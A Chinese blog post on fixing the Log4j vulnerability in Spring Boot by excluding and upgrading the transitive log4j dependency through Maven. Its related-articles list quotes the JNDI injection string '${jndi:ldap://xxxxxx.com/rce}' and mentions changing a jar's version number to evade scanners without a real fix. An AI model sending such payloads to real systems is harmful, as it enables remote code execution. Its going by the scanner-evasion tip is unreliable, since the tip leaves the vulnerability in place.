2.Log4j漏洞修复及版本号升级

已于 2022-08-02 11:15:44 修改
阅读量2.5k 收藏 3
点赞数
分类专栏: 异常及解决 文章标签: log4j java 开发语言
于 2022-08-02 11:13:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42342676/article/details/126118510
版权
漏洞描述:

Apache-Log4j日志库版本号过低,存在bug,黑客可通过日志记录远程执行程序

解决办法:

需要升级项目中所引用到的log4j依赖的的版本号

存在的疑问:

而在springboot项目中,我们并未自己特地添加过关于Log4j的依赖,可在实际生成的代码jar中却存在着log4j的jar包?原因在于我们在springboot项目中的starter中底层所依赖了log4j。
在这里插入图片描述
而此时我们该如何升级log4j等最底层的jar包版本呢?

解决方式:

针对以上依赖传递性的原因造成底层的jar包需要进行升级,解决方式有两种。

方式一:

在这里插入图片描述

在starter中先对需要进行版本升级的依赖进行排除,后通过dependency标签自行引入依赖并指定版本号。若是父子项目,可在父项目中处理,子项目则会直接继承父项目的属性。

方式二:

在这里插入图片描述
在这里插入图片描述
通过dependencyManagement标签对需要进行版本号替换的依赖进行版本号声明,在starter中排除需要版本号替换的依赖,再通过dependency标签引入依赖,此时不需要再指定版本号,因版本号在mangement标签中已作声明。

结果:

在这里插入图片描述
通过上述两种方式,最终的依赖如图,log4j的版本号得到了升级,经过测试与验证,漏洞也得到修复。

苏秋远
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
log4j漏洞修复升级jar包(log4j-api-2.17.0.jar)
03-09
log4j漏洞修复升级jar包(log4j-api-2.17.0.jar)
Log4j 任意代码执行漏洞,组件升级
Xzh_java的博客
11-30 270
任意代码执行2021 年 12 月 9 日,该项目被曝存在 严重安全漏洞 ,攻击者只需要向目标机传入一段特殊代码,就能触发漏洞,自由地在远程执行任意代码来控制目标机器!Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。
使用云效Codeup10分钟紧急修复Apache Log4j2漏洞
最新发布
qq_53058639的博客
05-15 649
简介:2021年12月10日,国家信息安全漏洞共享平台(CNVD)收录了Apache Log4j2远程代码执行漏洞(CNVD-2021-95914),此漏洞是一个基于Java的日志记录工具,为Log4j升级。作为目前最优秀的Java日志框架之一,被大量用于业务系统开发。早在2021年11月24日阿里巴巴云安全团队就报告了该漏洞,为了帮助大家更快的识别漏洞,避免受到潜在的攻击,云效技术团队提供了针对该漏洞的处理方案。
解决Apache Log4j版本漏洞(版本升级
qq_45752401的博客
12-14 4641
近日,Apache Log4j2 的远程代码执行漏洞刷爆网络,该漏洞一旦被攻击者利用会造成严重危害。而且此次漏洞影响巨大,Apache Log4j2可是全民级的日志组件,百分之九十的项目,都是通过log4j2输出日志的,甚至BAT大厂也是如此,很多互联网企业也都连夜做了应急措施 本次以IDEA为例 1,在idea右侧找maven,如果没有,可以点击最上方的菜单栏的view -->Tool Windows --> maven ...
CVE-2021-44228 Log4j2漏洞复现
Cover-3321的博客
01-07 1856
apache log4j: 是java语言中的日志处理套件/程序。2.0-2.14.1存在JNDI注入漏洞,导致攻击者可以控制日志内容的情况下,传入${jndi:ldap://xxxxxx.com/rce}的参数进行JNDI注入,执行远程命令。
log4j2原理分析及漏洞复现
HUANGXIN9898的博客
10-23 867
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发开发者可以利用该工具将程序的输入输出信息进行日志记录。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,导致攻击者可直接构造恶意请求,触发远程代码执行漏洞,从而获得目标服务器权限。在java中最常用的日志框架是log4j2和logback,其中log4j2支持。
Java 日志系列(一):详解主流日志框架Log4jLog4j 2、JUL、Commons Logging和Slf4j&Logback
Jin_Kwok的博客
09-11 1927
优雅的日志系统可以记录操作轨迹,监控系统运行状况以及回溯系统故障。在工作中,部分工程师对主流的日志框架仍然是一知半解,日常应用还停留在复制粘贴的层面,因此写作本文,希望对读者有所帮助。笔者将通过 3 篇文章全面系统地介绍 Java 日志框架,主要内容如下:日志的意义与价值;Java 日志框架进化史;日志门面与日志系统;日志框架的使用选择;日志使用中需要遵循的规范及注意事项;日志使用示例及常见报错。
log4j漏洞修复升级jar包(log4j-1.2-api-2.17.0.jar)
03-09
log4j漏洞修复升级jar包(log4j-1.2-api-2.17.0.jar)
log4j漏洞修复升级jar包(log4j-core-2.17.0.jar)
03-09
log4j漏洞修复升级jar包(log4j-core-2.17.0.jar)
log4j2版本漏洞 修复版本2.15.0
12-17
Log4j2版本漏洞修复方案》 在IT安全领域,漏洞的发现与修复是保障系统稳定运行的重要环节。此次我们关注的是“log4j2版本漏洞”,这是一个影响广泛且严重的问题,尤其是在Java应用程序中。Log4j2是Apache基金会...
log4j2版本漏洞 修复版本2.16.0
12-17
本文将深入探讨Log4j2漏洞的本质、影响及修复方案,特别关注2.16.0版本的更新内容。 Log4j2是一款广泛使用的Java日志记录框架,由于其灵活性和高效性,在企业级应用中被大量采用。然而,随着 CVE-2021-44228 漏洞的...
【紧急】Apache Log4j任意代码执行漏洞安全风险升级修复教程
2301_77110907的博客
04-16 840
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。研究,那么很难做到真正的技术提升。目前漏洞rce-exp已网上公开。dnslog回显测试。
log4j漏洞log4j 1.x漏洞依赖包解决方案
你的博客
05-05 4061
那么自己的程序中确定是没有引用了,那log4j的引用必定是程序中的第三方依赖包了。如果觉得上面办法比较麻烦,也并不适合自己的场景,还有一个办法,这个办法只能躲过扫描,并未实际解决log4j漏洞问题,那就是将引入的log4j 1.2.17的包中的版本去改掉,直接修改配置中的版本号,就能躲过扫描。对于应用中我们自己写的程序全部替换为新版本。考虑了很久,某时灵光一闪,既然没有log4j的引用类,那么就在程序中创建这些类吧,这样log4j的几个自定义类仍然可以被其他包引用,而应用中又不需要引用log4j的原始包。
Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)
weixin_44047654的博客
01-09 1476
Apache Log4j2 远程代码执行漏洞< 2.15.0(CVE-2021-44228)
解决项目中log4j版本漏洞
weixin_43573186的博客
12-29 4010
解决项目中log4j版本漏洞 前言:作为程序员应该都知道最近log4j出现的漏洞问题,讲一讲我所在的公司,其实领导在log4j被爆出存在漏洞的当天就在群里说了这个事,并且让我们把自己负责的系统都检查一遍,有使用到log4j存在漏洞的版本都要进行更新(因为有些版本还没爆出存在安全问题),但是当时都没什么人去注意,结果直到上周末,我们组负责的一个缴费系统出现不能缴费的情况,才发现是中了病毒。然后领导们开始极度重视,专门安排人监督我们来更新log4j版本。 废话不多说了,讲一下我负责的系统更新方式: 首先,一般
Log4j安全漏洞前车之鉴,呕心整理工作中常用开源组件避坑版本
bytearch
01-21 3174
前段时间log4j安全漏洞事件,可以说掀起了一场”血雨腥风“,正好最近做了一个项目对安全要求特别高,对有安全漏洞开源组件做了统一修复。特此总结,希望对大家以后选择组件版本时有所帮助。
Log4j 漏洞修复和临时补救方法
12-14 3755
1.2 漏洞评级及影响版本 Apache Log4j 远程代码执行漏洞 严重 影响的版本范围:Apache Log4j 2.x <= 2.14.1 2.log4j2 漏洞简单演示 创建maven工程 引入jar包依赖 <dependencies> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifa
Log4j2漏洞
热门推荐
qq_20025777的博客
12-10 2万+
Log4j2漏洞危害:高危、远程代码执行
log4j CVE-2019-17571 漏洞复现
01-02 1万+
一、漏洞描述 Log4j1.2版本中包含一个SocketServer类,在未经验证的情况下,该SocketServe类很容易接受序列化的日志事件并对其进行反序列化,在结合反序列化工具使用时,可以利用该类远程执行任意代码。 二、漏洞复现 2.1 启动SocketServer端 import org.apache.log4j.Logger; import org.apache.log...
log4j2漏洞修复建议
05-25
log4j2漏洞是一个非常严重的安全问题,已经被广泛关注和报道。如果你使用log4j2作为应用程序的日志框架,以下是一些修复建议: 1. 更新log4j2版本:Apache已经发布了log4j2的安全补丁,建议升级至最新版本。如果升级不可行,也可以考虑使用其他日志框架。 2. 配置log4j2:通过配置log4j2,可以减轻漏洞的影响。例如,可以禁用JNDI查找、限制网络访问等。 3. 防火墙:如果应用程序不需要外部网络访问,可以通过防火墙限制对应用程序的访问。 4. 应用程序代码:在应用程序代码中,可以避免使用动态类加载,尽可能使用静态类加载。 5. 审查应用程序:检查应用程序中是否存在使用log4j2的漏洞风险,特别是那些允许用户输入的地方。 总之,修复log4j2漏洞需要多方面的措施,建议及时采取措施保护你的应用程序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值